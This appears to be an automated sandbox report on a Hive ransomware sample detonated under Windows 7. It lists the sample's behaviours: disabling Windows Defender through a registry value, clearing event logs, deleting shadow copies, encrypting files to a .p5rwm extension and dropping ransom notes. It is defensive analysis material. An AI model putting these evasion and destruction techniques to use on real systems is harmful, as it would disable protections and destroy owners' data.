memory/700-228-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

memory/700-254-0x0000017BEE113000-0x0000017BEE115000-memory.dmp

memory/700-255-0x0000017BEE116000-0x0000017BEE118000-memory.dmp

memory/700-253-0x0000017BEE110000-0x0000017BEE112000-memory.dmp

memory/1780-252-0x000001D104878000-0x000001D104879000-memory.dmp

memory/700-256-0x0000017BD4260000-0x0000017BD4262000-memory.dmp

memory/700-257-0x0000017BEE118000-0x0000017BEE119000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:30

Reported

2022-01-12 16:36

Platform

win7-en-20211208

Max time kernel

153s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\HideConvert.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\RepairTest.crw => C:\Users\Admin\Pictures\RepairTest.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\RepairTest.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\SuspendSkip.tif => C:\Users\Admin\Pictures\SuspendSkip.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\MountDisable.crw => C:\Users\Admin\Pictures\MountDisable.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\UnlockSubmit.png => C:\Users\Admin\Pictures\UnlockSubmit.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\InstallRequest.png => C:\Users\Admin\Pictures\InstallRequest.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\MountDisable.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitLimit.tiff => C:\Users\Admin\Pictures\SubmitLimit.tiff.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitLimit.tiff.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\SuspendSkip.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\HideConvert.tif => C:\Users\Admin\Pictures\HideConvert.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\InstallRequest.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnlockSubmit.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15184_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnssci.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\mip.exe.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00586_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285410.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14582_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime.css.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VSTO\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\DELETE.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\settings.html C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_OFF.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityMergeLetter.Dotx.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099171.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_COL.HXC.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01292_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\msaccess.exe.manifest.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\css\settings.css C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099163.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\init.js C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSCONFIG.CHM.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Minesweeper\de-DE\Minesweeper.exe.mui.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
